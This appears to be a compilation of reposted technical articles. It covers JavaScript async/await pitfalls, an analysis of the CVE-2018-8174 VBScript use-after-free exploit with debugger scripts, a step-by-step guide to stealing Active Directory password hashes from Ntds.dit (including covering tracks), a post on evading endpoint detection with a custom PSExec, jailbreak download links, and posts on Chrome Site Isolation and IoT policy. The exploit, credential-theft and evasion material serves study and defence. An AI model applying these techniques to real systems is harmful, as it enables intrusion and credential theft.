Essentially, async functions are still promises. You have to understand promises before you can use async functions correctly, and even worse, most of the time you need to use promises along with async functions.

Consider the getBooksByAuthorWithAwait() and getBooksByAuthorWithPromise() functions in the above example. Note that they are not only functionally identical, they also have exactly the same interface! This means getBooksByAuthorWithAwait() will return a promise if you call it directly.

Well, this is not necessarily a bad thing. Only the name await gives people a feeling that "Oh great, this can convert asynchronous functions to synchronous functions," which is actually wrong.

Async/await Pitfalls

So what mistakes may be made when using async/await? Here are some common ones.

Too Sequential

Although await can make your code look synchronous, keep in mind that it is still asynchronous, and care must be taken to avoid being too sequential.
async getBooksAndAuthor(authorId) {
  const books = await bookModel.fetchAll();
  const author = await authorModel.fetch(authorId);
  return {
    author,
    books: books.filter(book => book.authorId === authorId),
  };
}

This code looks logically correct. However, it is wrong. await bookModel.fetchAll() will wait until fetchAll() returns; only then will await authorModel.fetch(authorId) be called. Notice that authorModel.fetch(authorId) does not depend on the result of bookModel.fetchAll(); in fact they can be called in parallel! By using await here, the two calls become sequential and the total execution time will be much longer than the parallel version. Here is the correct way:

async getBooksAndAuthor(authorId) {
  const bookPromise = bookModel.fetchAll();
  const authorPromise = authorModel.fetch(authorId);
  const books = await bookPromise;
  const author = await authorPromise;
  return {
    author,
    books: books.filter(book => book.authorId === authorId),
  };
}

Or even worse, if you want to fetch a list of items one by one, you have to rely on promises:

async getAuthors(authorIds) {
  // WRONG, this will cause sequential calls
  // const authors = _.map(
  //   authorIds,
  //   async id => await authorModel.fetch(id));

  // CORRECT
  const promises = _.map(authorIds, id => authorModel.fetch(id));
  const authors = await Promise.all(promises);
  return authors;
}

In short, you still need to think about the workflow asynchronously, then write the code synchronously with await. In complicated workflows it might be easier to use promises directly.

Error Handling

With promises, an async function has two possible outcomes: a resolved value and a rejected value. We can use .then() for the normal case and .catch() for the exceptional case. However, with async/await, error handling can be tricky.

try...catch

The most standard (and my recommended) way is to use a try...catch statement. When you await a call, any rejected value will be thrown as an exception.
Here is an example:

class BookModel {
  fetchAll() {
    return new Promise((resolve, reject) => {
      window.setTimeout(() => { reject({'error': 400}) }, 1000);
    });
  }
}

// async/await
async getBooksByAuthorWithAwait(authorId) {
  try {
    const books = await bookModel.fetchAll();
  } catch (error) {
    console.log(error);  // { "error": 400 }
  }
}

The caught error is exactly the rejected value. After we have caught the exception, we have several ways to deal with it:

Handle the exception and return a normal value. (Not using any return statement in the catch block is equivalent to using return undefined;, and undefined is a normal value as well.)

Throw it, if you want the caller to handle it. You can either throw the plain error object directly, like throw error;, which allows you to use this async getBooksByAuthorWithAwait() function in a promise chain (i.e. you can still call it like getBooksByAuthorWithAwait().then(...).catch(error => ...)); or you can wrap the error in an Error object, like throw new Error(error), which will give the full stack trace when the error is displayed in the console.

Reject it, like return Promise.reject(error). This is equivalent to throw error, so it is not recommended.

The benefits of using try...catch are:

Simple, traditional. As long as you have experience with other languages such as Java or C++, you won't have any difficulty understanding this.

You can still wrap multiple await calls in a single try...catch block to handle errors in one place, if per-step error handling is not necessary.

There is also one flaw in this approach. Since try...catch will catch every exception in the block, some exceptions that would not usually be caught by promises will be caught too.
Think about this example:

class BookModel {
  fetchAll() {
    cb(); // note `cb` is undefined and will result in an exception
    return fetch('/books');
  }
}

try {
  bookModel.fetchAll();
} catch (error) {
  console.log(error); // This will print "cb is not defined"
}

Run this code and you will get an error ReferenceError: cb is not defined in the console, in black color. The error was output by console.log(), not by JavaScript itself. Sometimes this could be fatal: if BookModel is enclosed deep in a series of function calls and one of the calls swallows the error, then it will be extremely hard to find an undefined error like this.

Making functions return both values

Another way of error handling is inspired by the Go language. It allows an async function to return both the error and the result. See this blog post for the details:

How to write async await without try-catch blocks in Javascript (blog.grossman.io)

In short, you can use an async function like this:

[err, user] = await to(UserModel.findById(1));

Personally I don't like this approach since it brings Go style into JavaScript, which feels unnatural, but in some cases it might be quite useful.

Using .catch

The final approach we will introduce here is to continue using .catch(). Recall the functionality of await: it will wait for a promise to complete its job. Also recall that promise.catch() will return a promise too! So we can write error handling like this:

// books === undefined if an error happens,
// since nothing is returned in the catch statement
let books = await bookModel.fetchAll()
  .catch((error) => { console.log(error); });

There are two minor issues in this approach:

It is a mixture of promises and async functions. You still need to understand how promises work to read it.

Error handling comes before the normal path, which is not intuitive.
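The Go-style to() helper shown earlier is not built into the language. A minimal sketch of how such a helper could look (the name to follows the linked post; the promises are made up for illustration):

```javascript
// Wrap a promise so it resolves to an [error, result] pair instead of throwing.
function to(promise) {
  return promise
    .then(result => [null, result])
    .catch(error => [error, null]);
}

// Usage sketch with hypothetical async results:
async function demo() {
  const [err1, user] = await to(Promise.resolve('user-1'));
  console.log(err1, user); // null 'user-1'

  const [err2, missing] = await to(Promise.reject(new Error('not found')));
  console.log(err2.message, missing); // 'not found' null
}

demo();
```

Because the wrapper always resolves, the caller can destructure the pair and check the error slot instead of writing a try...catch block.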
Conclusion

The async/await keywords introduced by ES2017 are definitely an improvement to JavaScript asynchronous programming. They can make code easier to read and debug. However, in order to use them correctly, one must completely understand promises, since async/await is no more than syntactic sugar and the underlying technique is still promises.

Hope this post has given you some ideas about async/await and can help you prevent some common mistakes. Thanks for reading, and please clap for me if you like this post.

Charlee Li
Full stack engineer & tech writer @ Toronto.

Sursa: https://hackernoon.com/javascript-async-await-the-good-part-pitfalls-and-how-to-use-9b759ca21cda
Dissecting modern browser exploit: case study of CVE-2018-8174

When this exploit first emerged at the turn of April and May it piqued my interest, since despite heavy obfuscation the code structure seemed well organized and the vulnerability exploitation code small enough to make analysis simpler. I downloaded the PoC from GitHub and decided it would be a good candidate for a look under the hood. At that time two analyses had already been published, the first from 360 and the second from Kaspersky. Both of them helped me understand how it worked, but they were not enough to deeply understand every aspect of the exploit. That's why I decided to analyze it on my own and share my findings.

Preprocessing

First, in order to remove the integer obfuscation, I used regex substitution in a Python script. As for the obfuscated names, I renamed them progressively during analysis. This analysis is best read alongside the source code, a link to which is at the end.

Use after free

The vulnerability occurs when an object is terminated and the custom-defined function Class_Terminate() is called. In this function a reference to the object being freed is saved in UafArray. From then on, UafArray(i) refers to the deleted object.

Also notice the last line in Class_Terminate(). When we copy the ClassTerminate object to UafArray, its reference counter is increased. To balance it out we free it again by assigning another value to FreedObjectArray. Without this, the object's memory wouldn't be freed despite Class_Terminate being called on it, and the next object wouldn't be allocated in its place.

Creating and deleting new objects is repeated 7 times in a loop; after that a new object of class ReuseClass is created. It's allocated in the same memory that was previously occupied by the 7 ClassTerminate instances.
To better understand that, here is a simple WinDbg script that tracks all those allocations:

bp vbscript!VBScriptClass::TerminateClass ".printf \"Class %mu at %x, terminate called\\n\", poi(@ecx + 0x24), @ecx; g";
bp vbscript!VBScriptClass::Release ".printf \"Class %mu at: %x ref counter, release called: %d\\n\", poi(@eax + 0x24), @ecx, poi(@eax + 0x4); g";
bp vbscript!VBScriptClass::Create+0x55 ".printf \"Class %mu created at %x\\n\", poi(@esi + 0x24), @esi; g";

Here is the allocation log from the UafTrigger function:

Class EmptyClass created at 3a7d90
Class EmptyClass created at 3a7dc8
...
Class ReuseClass created at 22601a0
Class ReuseClass created at 22601d8
Class ReuseClass created at 2260210
...
Class ClassTerminateA created at 22605c8
Class ClassTerminateA at: 70541748 ref counter, release called: 2
Class ClassTerminateA at: 70541748 ref counter, release called: 2
Class ClassTerminateA at: 70541748 ref counter, release called: 2
Class ClassTerminateA at: 70541748 ref counter, release called: 1
Class ClassTerminateA at 22605c8, terminate called
Class ClassTerminateA at: 70541748 ref counter, release called: 5
Class ClassTerminateA at: 70541748 ref counter, release called: 4
Class ClassTerminateA at: 70541748 ref counter, release called: 3
Class ClassTerminateA at: 70541748 ref counter, release called: 2
Class ClassTerminateA created at 22605c8
Class ClassTerminateA at: 70541748 ref counter, release called: 2
Class ClassTerminateA at: 70541748 ref counter, release called: 2
Class ClassTerminateA at: 70541748 ref counter, release called: 2
Class ClassTerminateA at: 70541748 ref counter, release called: 1
Class ClassTerminateA at 22605c8, terminate called
Class ClassTerminateA at: 70541748 ref counter, release called: 5
Class ClassTerminateA at: 70541748 ref counter, release called: 4
Class ClassTerminateA at: 70541748 ref counter, release called: 3
Class ClassTerminateA at: 70541748 ref counter, release called: 2
...
Class ReuseClass created at 22605c8
...
Class ClassTerminateB created at 2260600
Class ClassTerminateB at: 70541748 ref counter, release called: 2
Class ClassTerminateB at: 70541748 ref counter, release called: 2
Class ClassTerminateB at: 70541748 ref counter, release called: 2
Class ClassTerminateB at: 70541748 ref counter, release called: 1
Class ClassTerminateB at 2260600, terminate called
Class ClassTerminateB at: 70541748 ref counter, release called: 5
Class ClassTerminateB at: 70541748 ref counter, release called: 4
Class ClassTerminateB at: 70541748 ref counter, release called: 3
Class ClassTerminateB at: 70541748 ref counter, release called: 2
...
Class ReuseClass created at 2260600

We can immediately see that ReuseClass is indeed allocated in the same memory that was assigned to the 7 previous instances of ClassTerminate. This is repeated twice. We end up with two objects referenced by the UafArrays. None of those references is reflected in the objects' reference counters.

In this log we can also notice that even after Class_Terminate was called, there are some object manipulations that change the reference counter. That's why, if we didn't balance this counter out in Class_Terminate, we would get something like this:

Class ClassTerminateA created at 2240708
Class ClassTerminateA at: 6c161748 ref counter, release called: 2
Class ClassTerminateA at: 6c161748 ref counter, release called: 2
Class ClassTerminateA at: 6c161748 ref counter, release called: 2
Class ClassTerminateA at: 6c161748 ref counter, release called: 1
Class ClassTerminateA at 2240708, terminate called
Class ClassTerminateA at: 6c161748 ref counter, release called: 5
Class ClassTerminateA at: 6c161748 ref counter, release called: 4
Class ClassTerminateA at: 6c161748 ref counter, release called: 3
Class ReuseClass created at 2240740

Different allocation addresses: the exploit would fail to create the use-after-free condition.

Type Confusion

Having created those two objects, with 7 uncounted references to each, we have established an arbitrary-memory-read primitive.
There are two similar classes, ReuseClass and FakeReuseClass. By replacing the first class with the second one, a type confusion on the mem member occurs.

In the SetProp function, ReuseClass.mem is saved and the Default Property Get of class ReplacingClass_* is called; the result of that call will be placed in ReuseClass.mem. Inside that getter, UafArray is emptied by assigning 0 to each element. This causes VBScriptClass::Release to be called on the ReuseClass object that is referenced by UafArray. It turns out that at this stage of execution the ReuseClass object has a reference counter equal to 7, and since we call Release 7 times, the object gets freed. And because those references came from the use-after-free situation, they are not accounted for in the reference counter.

In place of ReuseClass, a new object of FakeReuseClass is allocated. Now, to get its reference counter equal to 7 as was the case with ReuseClass, we assign it 7 times to UafArray. Here is the memory layout before and after this operation.

After this is done, the getter function will return a value that will be assigned to the old ReuseClass::mem variable. As can be seen in the memory dumps, the old value was placed 0xC bytes before the new one. The objects were specially crafted to cause this situation, for example by selecting proper lengths for the function names. Now the value written to ReuseClass::mem will overwrite the FakeReuseClass::mem header, causing the type confusion. The last line assigned the string FakeArrayString to objectImitatingArray.mem. The header now has the value VT_BSTR.

Q=CDbl("174088534690791e-324") ' db 0, 0, 0, 0, 0Ch, 20h, 0, 0

This value overwrote objectImitatingArray.mem's type to VT_ARRAY | VT_VARIANT, and now the pointer to the string will be interpreted as a pointer to a SAFEARRAY structure.

Arbitrary memory read

The result is that we end up with two objects of FakeReuseClass.
One of them has a mem member array that addresses the whole user space (0x00000000 - 0x7fffffff), and the other has a member of type VT_I4 (4-byte integer) with a pointer to an empty 16-byte string. Using the second object, a pointer to the string is leaked:

some_memory=resueObjectB_int.mem

It will later be used as an address of memory that is writable.

The next step is to leak any address inside vbscript.dll. Here a very neat trick is used. First we declare that on error, the script should just continue regular execution. Then there is an attempt to assign EmptySub to a variable. This is not possible in VBS, but a value is still pushed on the stack before the error is generated. The next instruction should assign null to a variable, which it does, by simply changing the type of the last value on the stack to VT_NULL. Now emptySub_addr_placeholder holds a pointer to the function, but with its type set to VT_NULL. Then this value is written to our writable memory, its type is changed to VT_I4, and it is read back as an integer. If we check the content of this value, it turns out to be a pointer to CScriptEntryPoint, whose first member is a vftable pointing inside vbscript.dll.

To read a value from an arbitrary address, in this case the pointer returned from LeakVBAddr, the following functions are used. The read is achieved by first writing address+4 to writable memory, then changing the type to VT_BSTR. Now address+4 is treated as a pointer to a BSTR. If we call LenB on address+4 it will return the value pointed to by address. Why? Because of how a BSTR is defined: the Unicode value is preceded by its length, and that length is what LenB returns.

Now that an address inside vbscript.dll has been leaked, and having established arbitrary memory read, it is a matter of properly traversing the PE header to obtain all the needed addresses. The details of doing that won't be explained here; this article explains the PE file format in great detail.

Triggering code execution

Final code execution is achieved in two steps.
First, a chain of two calls is built, but it's not a ROP chain. NtContinue is provided with a CONTEXT structure that sets EIP to the VirtualProtect address and ESP to a structure containing VirtualProtect's parameters.

First, the address of the shellcode is obtained using the previously described technique of changing the variable type to VT_I4 and reading the pointer. Next, a structure for VirtualProtect is built that contains all the necessary parameters, like the shellcode address, size, and RWX protections. It also has space that will be used by stack operations inside VirtualProtect. After that, a CONTEXT structure is built with EIP set to VirtualProtect and ESP to its parameters. This structure also has, as its first value, a pointer to the NtContinue address repeated 4 times. The final step before starting this chain is to save the structure as a string in memory.

This function is then used to start the chain. First it changes the type of the saved structure to 0x4D and then sets its value to 0; this causes VAR::Clear to be called. And a dynamic view from the debugger.

Although it might seem complicated, this chain of execution is very simple. Just two steps: invoke NtContinue with a CONTEXT structure pointing to VirtualProtect; then VirtualProtect will disable DEP on the memory page that contains the shellcode and, after that, return into the shellcode.

Conclusion

CVE-2018-8174 is a good example of chaining a few use-after-free and type confusion conditions to achieve code execution in a very clever way. It's a great example to learn from and to understand the inner workings of such exploits.

Useful links

Commented exploit code
Kaspersky's root cause analysis
360's analysis
Another Kaspersky analysis
CVE-2014-6332 analysis by Trend Micro

Sursa: https://medium.com/@florek/dissecting-modern-browser-exploit-case-study-of-cve-2018-8174-1a6046729890
Extracting Password Hashes from the Ntds.dit File
March 27, 2017 | Jeff Warren

AD Attack #3 – Ntds.dit Extraction

With so much attention paid to detecting credential-based attacks such as Pass-the-Hash (PtH) and Pass-the-Ticket (PtT), other more serious and effective attacks are often overlooked. One such attack is focused on exfiltrating the Ntds.dit file from Active Directory Domain Controllers. Let's take a look at what this threat entails and how it can be performed. Then we can review some mitigating controls to be sure you are protecting your own environment from such attacks.

What is the Ntds.dit File?

The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. By extracting these hashes, it is possible to use tools such as Mimikatz to perform pass-the-hash attacks, or tools like Hashcat to crack these passwords. The extraction and cracking of these passwords can be performed offline, so they will be undetectable. Once an attacker has extracted these hashes, they are able to act as any user on the domain, including Domain Administrators.

Performing an Attack on the Ntds.dit File

In order to retrieve password hashes from the Ntds.dit, the first step is getting a copy of the file. This isn't as straightforward as it sounds, as the file is constantly in use by AD and locked. If you try to simply copy the file, you will see an error message similar to:

[screenshot of the file-in-use error omitted]

There are several ways around this using capabilities built into Windows, or with PowerShell libraries.
These approaches include:

- Use Volume Shadow Copies via the VSSAdmin command
- Leverage the NTDSUtil diagnostic tool available as part of Active Directory
- Use the PowerSploit penetration testing PowerShell modules
- Leverage snapshots if your Domain Controllers are running as virtual machines

In this post, I'll quickly walk you through two of these approaches: VSSAdmin and PowerSploit's NinjaCopy.

Using VSSAdmin to Steal the Ntds.dit File

Step 1 – Create a Volume Shadow Copy
Step 2 – Retrieve the Ntds.dit file from the Volume Shadow Copy
Step 3 – Copy the SYSTEM file from the registry or the Volume Shadow Copy. This contains the Boot Key that will be needed to decrypt the Ntds.dit file later.
Step 4 – Delete your tracks

Using PowerSploit NinjaCopy to Steal the Ntds.dit File

PowerSploit is a PowerShell penetration testing framework that contains various capabilities that can be used for exploitation of Active Directory. One module is Invoke-NinjaCopy, which copies a file from an NTFS-partitioned volume by reading the raw volume. This approach is another way to access files that are locked by Active Directory without alerting any monitoring systems.

Extracting Password Hashes

Regardless of which approach was used to retrieve the Ntds.dit file, the next step is to extract password information from the database. As mentioned earlier, the value of this attack is that once you have the files necessary, the rest of the attack can be performed offline to avoid detection. DSInternals provides a PowerShell module that can be used for interacting with the Ntds.dit file, including extraction of password hashes. Once you have extracted the password hashes from the Ntds.dit file, you are able to leverage tools like Mimikatz to perform pass-the-hash (PtH) attacks. Furthermore, you can use tools like Hashcat to crack these passwords and obtain their clear text values. Once you have the credentials, there are no limitations to what you can do with them.
How to Protect the Ntds.dit File

The best way to stay protected against this attack is to limit the number of users who can log onto Domain Controllers, including commonly protected groups such as Domain and Enterprise Admins, but also Print Operators, Server Operators, and Account Operators. These groups should be limited, monitored for changes, and frequently recertified. In addition, leveraging monitoring software to alert on and prevent users from retrieving files off Volume Shadow Copies will be beneficial to reduce the attack surface.

Here are the other blogs in the series:

AD Attack #1 – Performing Domain Reconnaissance (PowerShell)
AD Attack #2 – Local Admin Mapping (Bloodhound)
AD Attack #4 – Stealing Passwords from Memory (Mimikatz)

To watch the AD Attacks webinar, please click here.

Jeff Warren

Jeff Warren is STEALTHbits' Vice President of Product Management. Jeff has held multiple roles within the Product Management group since joining the organization in 2010, initially building STEALTHbits' SharePoint management offerings before shifting focus to the organization's Data Access Governance solution portfolio as a whole. Before joining STEALTHbits, Jeff was a Software Engineer at Wall Street Network, a solutions provider specializing in GIS software and custom SharePoint development. With deep knowledge and experience in technology, product and project management, Jeff and his teams are responsible for designing and delivering STEALTHbits' high quality, innovative solutions. Jeff holds a Bachelor of Science degree in Information Systems from the University of Delaware.

Sursa: https://blog.stealthbits.com/extracting-password-hashes-from-the-ntds-dit-file/
Mitigating Spectre with Site Isolation in Chrome
July 11, 2018
Posted by Charlie Reis, Site Isolator

Speculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers. A website could use such attacks to steal data or login information from other websites that are open in the browser. To better mitigate these attacks, we're excited to announce that Chrome 67 has enabled a security feature called Site Isolation on Windows, Mac, Linux, and Chrome OS. Site Isolation has been optionally available as an experimental enterprise policy since Chrome 63, but many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.

This launch is one phase of our overall Site Isolation project. Stay tuned for additional security updates that will mitigate attacks beyond Spectre (e.g., attacks from fully compromised renderer processes).

What is Spectre?

In January, Google Project Zero disclosed a set of speculative execution side-channel attacks that became publicly known as Spectre and Meltdown. An additional variant of Spectre was disclosed in May. These attacks use the speculative execution features of most CPUs to access parts of memory that should be off-limits to a piece of code, and then use timing attacks to discover the values stored in that memory. Effectively, this means that untrustworthy code may be able to read any memory in its process's address space. This is particularly relevant for web browsers, since browsers run potentially malicious JavaScript code from multiple websites, often in the same process. In theory, a website could use such an attack to steal information from other websites, violating the Same Origin Policy. All major browsers have already deployed some mitigations for Spectre, including reducing timer granularity and changing their JavaScript compilers to make the attacks less likely to succeed.
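Timer-granularity reduction, one of the mitigations mentioned above, can be illustrated with a small sketch. The 100-microsecond granularity used here is an arbitrary value for illustration, not the figure any particular browser ships:

```javascript
// Clamp a high-resolution timestamp to a coarse granularity, so that timing
// side channels observe far less precision than the hardware provides.
function clampTimerResolution(timeMicros, granularityMicros) {
  return Math.floor(timeMicros / granularityMicros) * granularityMicros;
}

console.log(clampTimerResolution(1234.567, 100)); // 1200
console.log(clampTimerResolution(1299.999, 100)); // 1200: indistinguishable
```

Two events 65 microseconds apart become indistinguishable through such a clamped timer, which is exactly what makes cache-timing measurements harder.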
However, we believe the most effective mitigation is offered by approaches like Site Isolation, which try to avoid having data worth stealing in the same process, even if a Spectre attack occurs.

What is Site Isolation?

Site Isolation is a large change to Chrome's architecture that limits each renderer process to documents from a single site. As a result, Chrome can rely on the operating system to prevent attacks between processes, and thus, between sites. Note that Chrome uses a specific definition of "site" that includes just the scheme and registered domain. Thus, https://google.co.uk would be a site, and subdomains like https://maps.google.co.uk would stay in the same process.

Chrome has always had a multi-process architecture where different tabs could use different renderer processes. A given tab could even switch processes when navigating to a new site in some cases. However, it was still possible for an attacker's page to share a process with a victim's page. For example, cross-site iframes and cross-site pop-ups typically stayed in the same process as the page that created them. This would allow a successful Spectre attack to read data (e.g., cookies, passwords, etc.) belonging to other frames or pop-ups in its process.

When Site Isolation is enabled, each renderer process contains documents from at most one site. This means all navigations to cross-site documents cause a tab to switch processes. It also means all cross-site iframes are put into a different process than their parent frame, using "out-of-process iframes." Splitting a single page across multiple processes is a major change to how Chrome works, and the Chrome Security team has been pursuing this for several years, independently of Spectre. The first uses of out-of-process iframes shipped last year to improve the Chrome extension security model.

A single page may now be split across multiple renderer processes using out-of-process iframes.
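The "site" definition described above (scheme plus registered domain) can be sketched in code. This is only a toy: real browsers consult the full Public Suffix List, while here two suffixes are hardcoded just to make the example self-contained:

```javascript
// Toy version of a "site" computation: scheme + registered domain.
// A real implementation would use the complete Public Suffix List.
const PUBLIC_SUFFIXES = ['co.uk', 'com'];

function siteFor(urlString) {
  const url = new URL(urlString);
  const host = url.hostname;
  const suffix = PUBLIC_SUFFIXES.find(s => host.endsWith('.' + s));
  if (!suffix) return `${url.protocol}//${host}`;
  // Keep only the label immediately before the public suffix.
  const labels = host.slice(0, host.length - suffix.length - 1).split('.');
  const registered = labels[labels.length - 1] + '.' + suffix;
  return `${url.protocol}//${registered}`;
}

// Both URLs map to the same site, so they may share a renderer process.
console.log(siteFor('https://maps.google.co.uk')); // https://google.co.uk
console.log(siteFor('https://google.co.uk'));      // https://google.co.uk
```

Two documents whose URLs reduce to the same value under this function would be eligible to share a renderer process; different values force a process switch.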
Even when each renderer process is limited to documents from a single site, there is still a risk that an attacker's page could access and leak information from cross-site URLs by requesting them as subresources, such as images or scripts. Web browsers generally allow pages to embed images and scripts from any site. However, a page could try to request an HTML or JSON URL with sensitive data as if it were an image or script. This would normally fail to render and not expose the data to the page, but that data would still end up inside the renderer process where a Spectre attack might access it.

To mitigate this, Site Isolation includes a feature called Cross-Origin Read Blocking (CORB), which is now part of the Fetch spec. CORB tries to transparently block cross-site HTML, XML, and JSON responses from the renderer process, with almost no impact to compatibility. To get the most protection from Site Isolation and CORB, web developers should check that their resources are served with the right MIME type and with the nosniff response header.

Site Isolation is a significant change to Chrome's behavior under the hood, but it generally shouldn't cause visible changes for most users or web developers (beyond a few known issues). It simply offers more protection between websites behind the scenes. Site Isolation does cause Chrome to create more renderer processes, which comes with performance tradeoffs: on the plus side, each renderer process is smaller, shorter-lived, and has less contention internally, but there is about a 10-13% total memory overhead in real workloads due to the larger number of processes. Our team continues to work hard to optimize this behavior to keep Chrome both fast and secure.

How does Site Isolation help?

In Chrome 67, Site Isolation has been enabled for 99% of users on Windows, Mac, Linux, and Chrome OS. (Given the large scope of this change, we are keeping a 1% holdback for now to monitor and improve performance.)
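To make the MIME-type/nosniff advice above concrete, here is a minimal sketch of the headers a server should attach to a sensitive JSON subresource so that CORB can reliably identify and protect it. The function name and payload are illustrative, not from the article:

```python
# Sketch: response headers for a sensitive JSON subresource, so that
# Cross-Origin Read Blocking (CORB) can reliably protect it.
import json

def json_response_headers(body: bytes) -> dict:
    return {
        # Declare the real type: CORB can then block cross-site reads of it.
        "Content-Type": "application/json",
        # Forbid MIME sniffing, so the response cannot be reinterpreted
        # as a script or image inside a cross-site renderer process.
        "X-Content-Type-Options": "nosniff",
        "Content-Length": str(len(body)),
    }

body = json.dumps({"balance": 1234}).encode()
headers = json_response_headers(body)
print(headers["X-Content-Type-Options"])  # → nosniff
```

Without the correct `Content-Type` and `nosniff`, CORB has to fall back on sniffing the response body, which is less reliable.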
This means that even if a Spectre attack were to occur in a malicious web page, data from other websites would generally not be loaded into the same process, and so there would be much less data available to the attacker. This significantly reduces the threat posed by Spectre. Because of this, we are planning to re-enable precise timers and features like SharedArrayBuffer (which can be used as a precise timer) for desktop.

What additional work is in progress?

We're now investigating how to extend Site Isolation coverage to Chrome for Android, where there are additional known issues. Experimental enterprise policies for enabling Site Isolation will be available in Chrome 68 for Android, and it can be enabled manually on Android using chrome://flags/#enable-site-per-process. We're also working on additional security checks in the browser process, which will let Site Isolation mitigate not just Spectre attacks but also attacks from fully compromised renderer processes. These additional enforcements will let us reach the original motivating goals for Site Isolation, where Chrome can effectively treat the entire renderer process as untrusted. Stay tuned for an update about these enforcements!

Finally, other major browser vendors are finding related ways to defend against Spectre by better isolating sites. We are collaborating with them and are happy to see the progress across the web ecosystem.

Help improve Site Isolation!

We offer cash rewards to researchers who submit security bugs through the Chrome Vulnerability Reward Program. For a limited time, security bugs affecting Site Isolation may be eligible for higher reward levels, up to twice the usual amount for information disclosure bugs. Find out more about Chrome New Feature Special Rewards.

Sursa: https://security.googleblog.com/2018/07/mitigating-spectre-with-site-isolation.html
Your IoT security concerns are stupid

Lots of government people are focused on IoT security, such as this recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question. Government efforts focus on vulns and patching, ignoring more important issues.

Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone/laptop computer, which is all "in your face", IoT devices, once installed, are quickly forgotten. For another thing, the average lifespan of a device on your network is at least twice the duration of support from the vendor making patches available. Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don't get applied cause a small but manageable constant hacking problem. Automatic patching causes rarer but more catastrophic events when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet, which was launched by subverting an automated patch of accounting software.

Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have unique requirements of being exposed to the Internet and needing a remote factory reset, leading to the worm. While notPetya did exploit a Microsoft vuln, its primary vector of spreading (after the subverted update) was via misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite supporting their vuln/patching policy, neither was really about vuln/patching.

Such technical analysis of events like Mirai and notPetya is ignored. Policymakers are only cherrypicking the superficial conclusions supporting their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them.

IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted. Those off-brand, poorly engineered security cameras you buy for $19 from Amazon.com, shipped directly from Shenzhen, now look very different, having less Internet exposure, than the ones used in Mirai. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services.

In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100-billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4-billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home.

Lastly, focusing on the vendor is a tired government cliche. Chronic internet security problems that go unsolved year after year, decade after decade, come from users failing, not vendors. Vendors quickly adapt, users don't. The most important solutions to today's IoT insecurities are to firewall and microsegment networks, something wholly within the control of users, even home users. Yet government policy makers won't consider the most important solutions, because their goal is less cybersecurity itself and more how cybersecurity can further their political interests.

The best government policy for IoT is to do nothing, or at least focus on more relevant solutions than patching vulns.
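The firewalling and microsegmentation the author points to can be as simple as a few rules on the home router. A hedged config sketch for a Linux router — the interface names (`iot0` for the IoT segment, `lan0` for the trusted LAN, `wan0` for the uplink) are assumptions for illustration, not from the post:

```shell
# Config sketch: microsegment an IoT network segment on a Linux router.
# Interface names (iot0, lan0, wan0) are illustrative assumptions.

# IoT devices may reach the Internet...
iptables -A FORWARD -i iot0 -o wan0 -j ACCEPT
# ...and may answer connections the trusted LAN initiated...
iptables -A FORWARD -i iot0 -o lan0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# ...but may not initiate connections into the trusted LAN.
iptables -A FORWARD -i iot0 -o lan0 -j DROP
# The LAN may still manage the IoT devices directly.
iptables -A FORWARD -i lan0 -o iot0 -j ACCEPT
```

The effect is that a compromised camera can phone out but cannot pivot into laptops or NAS boxes on the trusted segment.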
The ideas proposed above will add costs to devices while providing insignificant benefits to security. Yes, we will have IoT security issues in the future, but they will be new and interesting ones, requiring different solutions than the ones proposed.

Sursa: https://blog.erratasec.com/2018/07/your-iot-security-concerns-are-stupid.html#.W0ju6LhRWUk
Customized PSExec via Reflective DLL
July 13, 2018 ~ cplsec

Hey all, I'm back in the pocket after doing the deep dive into Hack The Box. I really enjoyed the bulk of the challenges and learned some great new tricks and techniques. One box I highly recommend is Reel. It's a great challenge with domain privilege escalation techniques that you might see in a pentest. Anyways, after reaching Guru status I decided to take a step back for a while; it's a part-time job working all the newly released boxes.

Before I went dark I was testing Cobalt Strike's built-in PSExec module against various Endpoint Protection Platform (EPP) products and was getting flagged. It was pretty clear that the EPPs weren't detecting the binary but were instead flagging via heuristic analysis. It might have been the randomized filename of the binary, the timing, writing to the ADMIN$ share, or some combination of these. I wrote some skeleton code that can be further customized to help bypass heuristic analysis. The current flow of the reflective DLL and Aggressor script can be seen below. You can find the code at https://github.com/ThunderGunExpress/Reflective_PSExec

The code and script are pretty crude and have the following limitations at the moment:
- Use an IP address as the target, not a hostname
- If running against a remote target, ensure the session is in a medium integrity context
- If running against a local target, ensure the session is in a high integrity context

Sursa: https://ijustwannared.team/2018/07/13/customized-psexec-via-reflective-dll/
Compatible with iOS 11.2 – 11.3.1
For all iPhones, iPods touch, iPads and Apple TVs

Download (Dev Account)
Uses multipath tcp exploit. Codesigning entitlements: Here
SHA1: 4c6e34a40621de2cd59cb3ebdf650307f7ccda93
Mirror: Mega

Download (Non Dev Account)
Uses vfs exploit.
SHA1: 8fa140a5a63377a44ff8ea4aa054605d261f270d
Mirror: Mega

Download (tvOS)
Thanks to nitoTV and Jaywalker for the tvOS port!
SHA1: cff12acb81396778d4da3d0f574599d355862863
Mirror: Mega

Important: Make sure to delete the 11.4 OTA update, install the tvOS profile (only install the tvOS profile on iOS) and reboot before using Electra!

Sursa: https://coolstar.org/electra/
OWASP Juice Shop

